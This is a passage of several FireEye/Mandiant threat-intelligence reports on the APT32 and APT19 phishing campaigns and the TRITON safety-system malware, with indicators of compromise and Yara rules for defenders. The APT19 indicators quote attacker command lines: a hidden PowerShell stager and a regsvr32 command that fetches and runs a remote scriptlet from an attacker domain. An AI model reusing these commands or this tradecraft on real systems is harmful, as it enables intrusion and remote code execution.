target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.
APT32 Tactics
In their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice
2/11
the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from
remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.
APT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had
.doc
file extensions, the recovered phishing lures were ActiveMime
.mht
web page archives that contained text
and images. These files were likely created by exporting Word documents into single file web pages.
Table 2 contains a sample of recovered APT32 multilingual lure files.
ActiveMime Lure Files
2017
.doc
(2017 Statistical Report on Staff Salary and Allowances)
5458a2e4d784abb1a1127263bd5006b5
Thong tin.doc
(Information)
ce50e544430e7265a45fab5a1f31e529
Phan Vu Tutn CV.doc
4f761095ca51bfbbf4496a4964e41d4f
Ke hoach cuu tro nam 2017.doc
(2017 Bailout Plan)
e9abe54162ba4572c770ab043f576784
Instructions to GSIS.doc
fba089444c769700e47c6b44c362f96b
Hoi thao truyen thong doc lap.doc
(Traditional Games)
f6ee4b72d6d42d0c7be9172be2b817c1
i th
ng m
i 2016 - h
ng.doc
(New 2016 Claim Form)
aa1f85de3e4d33f31b4f78968b29f175
Hoa don chi tiet tien no.doc
(Debt Details)
5180a8d9325a417f2d8066f9226a5154
Thu moi tham du Hoi luan.doc
(Collection of Participants)
f6ee4b72d6d42d0c7be9172be2b817c1
Danh sach nhan vien vi pham ky luat.doc
(List of Employee Violations)
6baafffa7bf960dec821b627f9653e44
-dung-qua
ng-ca
o.doc
(Internal Content Advertising)
471a2e7341f2614b715dc89e803ffcac
DVPM-VTC 31.03.17.doc
f1af6bb36cdf3cff768faee7919f0733
Table 2: Sampling of APT32 Lure Files
The Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure
files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows
a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve
the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message
instructing the recipient to enable content to properly display document font characters.
3/11
Figure 1: Example APT32 Phishing Lure
Fake Gmail Error Message
Figure 2: Example APT32 Phishing Lure
Fake Text Encoding Error Message
APT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the
distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors
injected into memory.
In order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time,
4/11
APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32
abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their
ActiveMime lures hosted externally on legitimate cloud storage services.
To enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page
functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.
Figure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.
Figure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking
When a document with this feature is opened, Microsoft Word will attempt to download the external image, even if
macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants
suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When
combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and
conduct further analysis about victim organizations while monitoring the interest of security firms.
Once macros were enabled on the target system, the malicious macros created two named scheduled tasks as
persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an
application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first
backdoor from APT32
s infrastructure and injected it into memory. The second named scheduled task, loaded as an
XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor,
delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific
backdoor and the other scheduled task initialized a commercially-available backdoor as backup.
To illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered
APT32 lure
2017
.doc
Figure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks
In this example, a scheduled task named
Windows Scheduled Maintenance
was created to run Casey Smith
Squiblydoo
App Whitelisting bypass every 30 minutes. While all payloads can be dynamically updated, at the time
of delivery, this task launched a COM scriptlet (
.sct
file extension) that downloaded and executed Meterpreter
hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate
with 80.255.3[.]87 using the Safebrowsing malleable C2 profile to further blend in with network traffic. A second
scheduled task named
Scheduled Defrags
was created by loading the raw task XML with a backdated task
creation timestamp of June 2, 2016. This second task ran
mshta.exe
every 50 minutes which launched an APT32specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains
5/11
blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.
Figure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multistage malware frameworks into memory.
6/11
Figure 5: APT32 Phishing Chain of Events
The impressive APT32 operations did not stop after they established a foothold in victim environments. Several
Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and
heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon
s Invoke-Obfuscation
framework.
APT32 regularly used stealthy techniques to blend in with legitimate user activity:
During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255)
masquerading as a Windows hotfix.
In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a
software deployment task in which all systems pulled the payload from the ePO server using the proprietary
SPIPE protocol.
APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system.
For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a
Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL
filename padded with a non-printing OS command control code.
APT32 Malware and Infrastructure
APT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning
multiple protocols. APT32 operations are characterized through deployment of signature malware payloads
including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along
with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess backdoor development
capabilities for macOS.
The capabilities for this unique suite of malware is shown in Table 3.
Malware
Capabilities
7/11
WINDSHIELD
Command and control (C2) communications via TCP raw sockets
Four configured C2s and six configured ports
randomly-chosen C2/port for
communications
Registry manipulation
Get the current module's file name
Gather system information including registry values, user name, computer name,
and current code page
File system interaction including directory creation, file deletion, reading, and writing
files
Load additional modules and execute code
Terminate processes
Anti-disassembly
KOMPROGO
Fully-featured backdoor capable of process, file, and registry management
Creating a reverse shell
File transfers
Running WMI queries
Retrieving information about the infected system
SOUNDBITE
C2 communications via DNS
Process creation
File upload
Shell command execution
File and directory enumeration/manipulation
Window enumeration
Registry manipulation
System information gathering
PHOREAL
C2 communications via ICMP
Reverse shell creation
Filesystem manipulation
Registry manipulation
Process creation
File upload
8/11
BEACON (Cobalt
Strike)
Publicly available payload that can inject and execute arbitrary code into processes
Impersonating the security context of users
Importing Kerberos tickets
Uploading and downloading files
Executing shell commands
Configured with malleable C2 profiles to blend in with normal network traffic
Co-deployment and interoperability with Metasploit framework
SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and
pivoting over SMB
Table 3: APT32 Malware and Capabilities
APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses
as command and control infrastructure. The FireEye iSIGHT Intelligence MySIGHT Portal contains additional
information on these backdoor families based on Mandiant investigations of APT32 intrusions.
Figure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.
Figure 6: APT32 Attack Lifecycle
Outlook and Implications
Based on incident response investigations, product detections, and intelligence observations along with additional
publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with
Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye
believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While
the motivation for each APT32 private sector compromise varied
and in some cases was unknown
the
unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption
measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32
continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide.
Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.
9/11
While actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and
responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability.
APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the
flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber
operations, there is a need for public awareness of these threats and renewed dialogue around emerging nationstate intrusions that go beyond public sector and intelligence targets.
APT32 Detection
Figure 7 contains a Yara rule can be used to identify malicious macros associated with APT32
s phishing lures:
Figure 7: Yara Rule for APT32 Malicious Macros
Table 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.
C2 Infrastructure
103.53.197.202
104.237.218.70
104.237.218.72
185.157.79.3
193.169.245.78
193.169.245.137
23.227.196.210
24.datatimes.org
80.255.3.87
blog.docksugs.org
blog.panggin.org
contay.deaftone.com
check.paidprefund.org
datatimes.org
docksugs.org
economy.bloghop.org
emp.gapte.name
facebook-cdn.net
gap-facebook.com
gl-appspot.org
help.checkonl.org
high.expbas.net
high.vphelp.net
icon.torrentart.com
10/11
images.chinabytes.info
imaps.qki6.com
img.fanspeed.net
job.supperpow.com
lighpress.info
menmin.strezf.com
mobile.pagmobiles.info
news.lighpress.info
notificeva.com
nsquery.net
pagmobiles.info
paidprefund.org
push.relasign.org
relasign.org
share.codehao.net
seri.volveri.net
ssl.zin0.com
static.jg7.org
syn.timeizu.net
teriava.com
timeizu.net
tonholding.com
tulationeva.com
untitled.po9z.com
update-flashs.com
vieweva.com
volveri.net
vphelp.net
yii.yiihao126.net
zone.apize.net
Table 4: Sampling of APT32 C2 Infrastructure
11/11
Privileges and Credentials: Phished at the Request of
Counsel
fireeye.com /blog/threat-research/2017/06/phished-at-the-request-of-counsel.html
Summary
In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment
firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with
some degree of sponsorship by the Chinese government.
APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged
RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199. Toward the end of
May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions,
APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure
delivered a Cobalt Strike payload.
As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we
cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment
firms for competitive economic purposes.
This purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide
technical indicators that their IT personnel can use for proactive hunting and detection.
The Emails
APT19 phishing emails from this campaign originated from sender email accounts from the "@cloudsend[.]net"
domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for
more details.
The Attachments
APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial
exploits. The following sections describe the two methods in further detail.
RTF Attachments
Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099, the observed RTF
attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted
at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF
files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.
1/14
Figure 1: RTF PCAP
XLSM Attachments
The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The
attachments also contained an image that requested the user to
Enable Content
, which would enable macro
support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files
(MD5:30f149479c02b741e897cdb9ecd22da7).
Figure 2: Enable macros
One of the malicious XLSM attachments that we observed contained a macro that:
1. Determined the system architecture to select the correct path for PowerShell
2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique
used by Meterpreter stagers.
Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).
2/14
3/14
Figure 3: XLSX Macro
Figure 4 contains the decoded output of the encoded text.
Figure 4: Decoded ZLIB + Base64 payload
4/14
The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of
autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is
executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with
minimal HTTP headers.
Figure 5: GET Request with minimal HTTP headers
Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out
network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.
Figure 6: Decoded shellcode
FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.
Figure 7: Alternate macro
This macro uses Casey Smith
Squiblydoo
Application Whitelisting bypass technique to run the command in
Figure 8.
Figure 8: Application Whitelisting Bypass
5/14
The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5:
1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.
Figure 9: SCT contents
Figure 10 provides the decoded script. Notice the
$DoIt
string, which is usually indicative of a Cobalt Strike
payload.
6/14
7/14
Figure 10: Decoded SCT contents
A quick conversion of the contents of the variable
$var_code
from Base64 to ASCII shows some familiar network
indicators, shown in Figure 11.
Figure 11: $var_code to ASCII
Second Stage Payload
Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload,
configured with the following parameters:
Process Inject Targets:
%windir%\syswow64\rundll32.exe
%windir%\sysnative\rundll32.exe
c2_user_agents
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts;
IE0006_ver1;EN_GB)
Named Pipes
\\%s\pipe\msagent_%x
beacon_interval
autodiscover.2bunny[.]com/submit.php
autodiscover.2bunny[.]com/IE9CompatViewList.xml
sfo02s01-in-f2.cloudsend[.]net/submit.php
sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
C2 Port
TCP/80
Figure 12 depicts an example of a BEACON C2 attempt from this payload.
8/14
Figure 12: Cobalt Strike BEACON C2
FireEye Product Detections
The following FireEye products currently detect and block the methods described above. Table 1 lists the current
detection and blocking capabilities by product.
Detection Name
Product
Action
Notes
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
Detect
XSLM Macro launch
Gen:Variant.Application.HackTool.CobaltStrike.1
Detect
XSLM Macro launch
Malware Object
Detect
BEACON written to disk
Backdoor.BEACON
Block*
BEACON Callback
FE_Malformed_RTF
EX/ETP/NX
Block*
Malware.Binary.rtf
EX/ETP/NX
Block*
Malware.Binary
EX/ETP/NX
Block*
Malware.Binary.xlsx
EX/ETP/NX
Block*
XSLM
Table 1: Detection review
*Appliances must be configured for block mode.
Recommendations
FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:
1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already
installed it.
2. Search historic and future emails that match the included indicators of compromise.
3. Review web proxy logs for connections to the included network based indicators of compromise.
4. Block connections to the included fully qualified domain names.
5. Review endpoints for the included host based indicators of compromise.
Indicators of Compromise
The following section provides the IOCs for the variants of the phishing emails and malicious payloads that FireEye
9/14
has observed during this campaign.
Email Senders
PressReader
Angela Suh
Ashley Safronoff
Lindsey Hersh
Sarah Roberto sarah.roberto@cloudsend[.]net
noreply@cloudsend[.]net
Email Subject Lines
Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
Macron Document Leaker Releases New Images, Promises More Information
Are Emmanuel Macron's Tax Evasion Documents Real?
Time Allocation
Vacancy Report
china paper table and graph
results with zeros
some ready not all finished
Macron Leaks contain secret plans for the islamisation of France and Europe
Attachment Names
Macron_Authenticity.doc.rtf
Macron_Information.doc.rtf
US and EU Trade with China and China CA.xlsm
Tables 4 5 7 Appendix with zeros.xlsm
Project Codes - 05.30.17.xlsm
Weekly Vacancy Status Report 5-30-15.xlsm
Macron_Tax_Evasion.doc.rtf
Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
lyncdiscover.2bunny[.]com
autodiscover.2bunny[.]com
lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
lyncdiscover.2bunny[.]com/Autodiscover
10/14
autodiscover.2bunny[.]com/K5om
sfo02s01-in-f2.cloudsend[.]net/submit.php
sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
tk-in-f156.2bunny[.]com
tk-in-f156.2bunny[.]com/Agreement.doc
104.236.77[.]169
138.68.45[.]9
162.243.143[.]145
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)
Host Based Indicators (HBI)
RTF MD5 hash values
0bef39d0e10b1edfe77617f494d733a8
0e6da59f10e1c4685bb5b35a30fc8fb6
cebd0e9e05749665d893e78c452607e2
XLSX MD5 hash values
38125a991efc6ab02f7134db0ebe21b6
3a1dca21bfe72368f2dd46eb4d9b48c4
30f149479c02b741e897cdb9ecd22da7
BEACON and Meterpreter payload MD5 hash values
bae0b39197a1ac9e24bdf9a9483b18ea
1151619d06a461456b310096db6bc548
Process arguments, named pipes, and file paths
powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader
($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
(,$([Convert]::FromBase64String("")
regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll
\\\pipe\msagent_<4 digits>
C:\Documents and Settings\\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original
GET request)
Yara Rules
11/14
rule FE_LEGALSTRIKE_MACRO {
meta:version=".1"
filetype="MACRO"
author="Ian.Ahl@fireeye.com @TekDefense"
date="2017-06-02"
description="This rule is designed to identify macros with the specific encoding used in the sample
30f149479c02b741e897cdb9ecd22da7."
strings:
// OBSFUCATION
$ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) &
ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
$ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) &
ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
$ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) &
ChrW(116) & ChrW(112) & ChrW(115)" ascii wide
$ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) &
ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
$ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) &
ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
$ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) &
ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
$ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) &
ChrW(101) & ChrW(114) & ChrW(32)" ascii wide
$ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) &
ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
$obreg1 = /(\w{5}\s&\s){7}\w{5}/
$obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/
// wscript
$wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
$wsobj2 = "Obj.Run " ascii wide
condition:
(uint16(0) != 0x5A4D)
all of ($wsobj*) and 3 of ($ob*)
all of ($wsobj*) and all of ($obreg*)
12/14
rule FE_LEGALSTRIKE_MACRO_2 {
meta:version=".1"
filetype="MACRO"
author="Ian.Ahl@fireeye.com @TekDefense"
date="2017-06-02"
description="This rule was written to hit on specific variables and powershell command fragments as seen in
the macro found in the XLSX file3a1dca21bfe72368f2dd46eb4d9b48c4."
strings:
// Setting the environment
$env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
$env2 = "windir = Environ(\"windir\")" ascii wide
$env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
// powershell command fragments
$ps1 = "-NoP" ascii wide
$ps2 = "-NonI" ascii wide
$ps3 = "-W Hidden" ascii wide
$ps4 = "-Command" ascii wide
$ps5 = "New-Object IO.StreamReader" ascii wide
$ps6 = "IO.Compression.DeflateStream" ascii wide
$ps7 = "IO.MemoryStream" ascii wide
$ps8 = ",$([Convert]::FromBase64String" ascii wide
$ps9 = "ReadToEnd();" ascii wide
$psregex1 = /\W\w+\s+\s\".+\"/
condition:
(uint16(0) != 0x5A4D)
all of ($env*) and 6 of ($ps*)
all of ($env*) and 4 of ($ps*) and all of ($psregex*)
13/14
rule FE_LEGALSTRIKE_RTF {
meta:
version=".1"
filetype="MACRO"
author="joshua.kim@FireEye.com"
date="2017-06-02"
description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain
2bunnyDOTcom"
strings:
$header = "{\\rt"
$lnkinfo = "4c0069006e006b0049006e0066006f"
$encoded1 = "4f4c45324c696e6b"
$encoded2 = "52006f006f007400200045006e007400720079"
$encoded3 = "4f0062006a0049006e0066006f"
$encoded4 = "4f006c0065"
$http1 = "68{"
$http2 = "74{"
$http3 = "07{"
// 2bunny.com
$domain1 = "32{\\"
$domain2 = "62{\\"
$domain3 = "75{\\"
$domain4 = "6e{\\"
$domain5 = "79{\\"
$domain6 = "2e{\\"
$domain7 = "63{\\"
$domain8 = "6f{\\"
$domain9 = "6d{\\"
$datastore = "\\*\\datastore"
condition:
$header at 0 and all of them
Acknowledgements
Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco,
Christopher Glyer
14/14
Attackers Deploy New ICS Attack Framework
TRITON
and Cause Operational Disruption to Critical Infrastructure
www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
Introduction
Mandiant recently responded to an incident at a critical infrastructure organization where an
attacker deployed malware designed to manipulate industrial safety systems. The targeted
systems provided emergency shutdown capability for industrial processes. We assess with
moderate confidence that the attacker was developing the capability to cause physical damage
and inadvertently shutdown operations. This malware, which we call TRITON, is an attack
framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We
have not attributed the incident to a threat actor, though we believe the activity is consistent
with a nation state preparing for an attack.
TRITON is one of a limited number of publicly identified malicious software families targeted at
industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and
Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016.
TRITON is consistent with these attacks, in that it could prevent safety mechanisms from
executing their intended function, resulting in a physical consequence.
Malware
Family
Main
Modules
Description
TRITON
trilog.exe
Main executable leveraging libraries.zip
library.zip
Custom communication library for interaction with Triconex
controllers.
Table 1: Description of TRITON Malware
Incident Summary
The attacker gained remote access to an SIS engineering workstation and deployed the
TRITON attack framework to reprogram the SIS controllers. During the incident, some SIS
controllers entered a failed safe state, which automatically shutdown the industrial process and
prompted the asset owner to initiate an investigation. The investigation found that the SIS
controllers initiated a safe shutdown when application code between redundant processing
units failed a validation check -- resulting in an MP diagnostic failure message.
We assess with moderate confidence that the attacker inadvertently shutdown operations while
developing the ability to cause physical damage for the following reasons:
1/10
Modifying the SIS could prevent it from functioning correctly, increasing the likelihood of
a failure that would result in physical consequences.
TRITON was used to modify application memory on SIS controllers in the environment,
which could have led to a failed validation check.
The failure occurred during the time period when TRITON was used.
It is not likely that existing or external conditions, in isolation, caused a fault during the
time of the incident.
Attribution
FireEye has not connected this activity to any actor we currently track; however, we assess
with moderate confidence that the actor is sponsored by a nation state. The targeting of critical
infrastructure as well as the attacker
s persistence, lack of any clear monetary goal and the
technical resources necessary to create the attack framework suggest a well-resourced nation
state actor. Specifically, the following facts support this assessment:
The attacker targeted the SIS suggesting an interest in causing a high-impact attack with
physical consequences. This is an attack objective not typically seen from cyber-crime groups.
The attacker deployed TRITON shortly after gaining access to the SIS system, indicating that
they had pre-built and tested the tool which would require access to hardware and software
that is not widely available. TRITON is also designed to communicate using the proprietary
TriStation protocol which is not publicly documented suggesting the adversary independently
reverse engineered this protocol.
The targeting of critical infrastructure to disrupt, degrade, or destroy systems is consistent with
numerous attack and reconnaissance activities carried out globally by Russian, Iranian, North
Korean, U.S., and Israeli nation state actors. Intrusions of this nature do not necessarily
indicate an immediate intent to disrupt targeted systems, and may be preparation for a
contingency.
Background on Process Control and Safety Instrumented Systems
2/10
Figure 1: ICS Reference Architecture
Modern industrial process control and automation systems rely on a variety of sophisticated
control systems and safety functions. These systems and functions are often referred to as
Industrial Control Systems (ICS) or Operational Technology (OT).
A Distributed Control System (DCS) provides human operators with the ability to remotely
monitor and control an industrial process. It is a computerized control system consisting of
computers, software applications and controllers. An Engineering Workstation is a computer
used for configuration, maintenance and diagnostics of the control system applications and
other control system equipment.
A SIS is an autonomous control system that independently monitors the status of the process
under control. If the process exceeds the parameters that define a hazardous state, the SIS
attempts to bring the process back into a safe state or automatically performs a safe shutdown
of the process. If the SIS and DCS controls fail, the final line of defense is the design of the
industrial facility, which includes mechanical protections on equipment (e.g. rupture discs),
physical alarms, emergency response procedures and other mechanisms to mitigate
3/10
dangerous situations.
Asset owners employ varied approaches to interface their plant's DCS with the SIS. The
traditional approach relies on the principles of segregation for both communication
infrastructures and control strategies. For at least the past decade, there has been a trend
towards integrating DCS and SIS designs for various reasons including lower cost, ease of
use, and benefits achieved from exchanging information between the DCS and SIS. We
believe TRITON acutely demonstrates the risk associated with integrated designs that allow bidirectional communication between DCS and SIS network hosts.
Safety Instrumented Systems Threat Model and Attack Scenarios
Figure 2: Temporal Relationship Between Cyber Security and Safety
The attack lifecycle for disruptive attacks against ICS is similar to other types of cyber attacks,
with a few key distinctions. First, the attacker
s mission is to disrupt an operational process
rather than steal data. Second, the attacker must have performed OT reconnaissance and
have sufficient specialized engineering knowledge to understand the industrial process being
controlled and successfully manipulate it.
Figure 2 represents the relationship between cyber security and safety controls in a process
control environment. Even if cyber security measures fail, safety controls are designed to
prevent physical damage. To maximize physical impact, a cyber attacker would also need to
bypass safety controls.
The SIS threat model below highlights some of the options available to an attacker who has
successfully compromised an SIS.
4/10
Attack Option 1: Use the SIS to shutdown the process
The attacker can reprogram the SIS logic to cause it to trip and shutdown a process that
is, in actuality, in a safe state. In other words, trigger a false positive.
Implication: Financial losses due to process downtime and complex plant start up
procedure after the shutdown.
Attack Option 2: Reprogram the SIS to allow an unsafe state
The attacker can reprogram the SIS logic to allow unsafe conditions to persist.
Implication: Increased risk that a hazardous situation will cause physical consequences
(e.g. impact to equipment, product, environment and human safety) due to a loss of SIS
functionality.
Attack Option 3: Reprogram the SIS to allow an unsafe state
while using the DCS to create
an unsafe state or hazard
The attacker can manipulate the process into an unsafe state from the DCS while
preventing the SIS from functioning appropriately.
Implication: Impact to human safety, the environment, or damage to equipment, the
extent of which depends on the physical constraints of the process and the plant design.
Analysis of Attacker Intent
We assess with moderate confidence that the attacker
s long-term objective was to develop
the capability to cause a physical consequence. We base this on the fact that the attacker
initially obtained a reliable foothold on the DCS and could have developed the capability to
manipulate the process or shutdown the plant, but instead proceeded to compromise the SIS
system. Compromising both the DCS and SIS system would enable the attacker to develop
and carry out an attack that causes the maximum amount of damage allowed by the physical
and mechanical safeguards in place.
Once on the SIS network, the attacker used their pre-built TRITON attack framework to
interact with the SIS controllers using the TriStation protocol. The attacker could have caused
a process shutdown by issuing a halt command or intentionally uploading flawed code to the
SIS controller to cause it to fail. Instead, the attacker made several attempts over a period of
time to develop and deliver functioning control logic for the SIS controllers in this target
environment. While these attempts appear to have failed due one of the attack scripts
conditional checks, the attacker persisted with their efforts. This suggests the attacker was
intent on causing a specific outcome beyond a process shutdown.
Of note, on several occasions, we have observed evidence of long term intrusions into ICS
which were not ultimately used to disrupt or disable operations. For instance, Russian
operators, such as Sandworm Team, have compromised Western ICS over a multi-year period
without causing a disruption.
Summary of Malware Capabilities
5/10
The TRITON attack tool was built with a number of features, including the ability to read and
write programs, read and write individual functions and query the state of the SIS controller.
However, only some of these capabilities were leveraged in the trilog.exe sample (e.g. the
attacker did not leverage all of TRITON
s extensive reconnaissance capabilities).
The TRITON malware contained the capability to communicate with Triconex SIS controllers
(e.g. send specific commands such as halt or read its memory content) and remotely
reprogram them with an attacker-defined payload. The TRITON sample Mandiant analyzed
added an attacker-provided program to the execution table of the Triconex controller. This
sample left legitimate programs in place, expecting the controller to continue operating without
a fault or exception. If the controller failed, TRITON would attempt to return it to a running
state. If the controller did not recover within a defined time window, this sample would overwrite
the malicious program with invalid data to cover its tracks.
Recommendations
Asset owners who wish to defend against the capabilities demonstrated in the incident, should
consider the following controls:
Where technically feasible, segregate safety system networks from process control and
information system networks. Engineering workstations capable of programming SIS
controllers should not be dual-homed to any other DCS process control or information
system network.
Leverage hardware features that provide for physical control of the ability to program
safety controllers. These usually take the form of switches controlled by a physical key.
On Triconex controllers, keys should not be left in the PROGRAM mode other than
during scheduled programming events.
Implement change management procedures for changes to key position. Audit current
key state regularly.
Use a unidirectional gateway rather than bidirectional network connections for any
applications that depend on the data provided by the SIS.
Implement strict access control and application whitelisting on any server or workstation
endpoints that can reach the SIS system over TCP/IP.
Monitor ICS network traffic for unexpected communication flows and other anomalous
activity.
6/10
Figure 3: Triconex Key Switch (source)
Appendix: Technical Analysis
Figure 4: TRITON Architecture and Attack Scenario
TRITON was deployed on an SIS engineering workstation running the Microsoft Windows
operating system. The malware was named to masquerade as the legitimate Triconex Trilog
application. This application is used for reviewing logs and is a part of the TriStation
application suite. The malware was delivered as a Py2EXE compiled python script dependent
on a zip file containing standard Python libraries, open source libraries, as well as the attacker7/10
developed Triconex attack framework for interacting with the Triconex controllers. Along with
the executable, two binary files, inject.bin (malicious function code) and imain.bin (malicious
control logic), were deployed as the controller
